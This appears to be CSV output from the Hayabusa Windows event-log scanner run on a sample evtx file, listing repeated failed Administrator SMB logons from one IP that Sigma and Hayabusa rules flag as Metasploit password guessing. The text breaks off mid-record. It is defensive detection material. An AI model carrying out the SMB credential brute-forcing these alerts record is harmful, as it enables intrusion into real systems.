SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: h17Fz1s6GJki61jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Pjjn4FAkJn4h32r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARVx3FAAww8Gmfvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sYIwPg5k1wpvWobN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0sfhYQ54SjC4JTX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nfZYnUPV40FShcqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XYbvWVCT0tFixZTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XC6Vmz0ql8myDuGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJ8JvuvZZzwSOzFo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s06yKaogI6FYkXla : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pCjOc7PguxwNKoQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BX5IosnpdYZK5xZj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfMjB1epEm64wVEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb4FVO2SKsoMyt1K : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1qoRw2jjFx4F6Wx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ImiLeiteLoSw32I0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcIYD47BIEP8gB0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lUAeB15aWamcaZ8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFOKiSDWc1dWjzge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hqyMtzjKSJEtEAdx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WtHsItpyFHQxvLWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RdGMqIhUGHj23Xm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfE5LVmrPaAFLwBR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1swKSla5gkdOwxH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kL9MdVnRVogiP7hF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aQ0hRdwZvC5PBcXl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ctbv73J0Dot9raD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wKpWApJIKkjbtaPB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kVTAv9VoNpUyxQFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xb3t1dpuk9JZri5p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.642 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fy0UrW8TWrxAOX90 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iUXUbUsiE6Ahh9iD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2QQdQ6rQYLBf15AF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:49.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zG4eJLuQ4u2dKQG0 : IP Address: 192.168.198.149 : AuthPackage: 
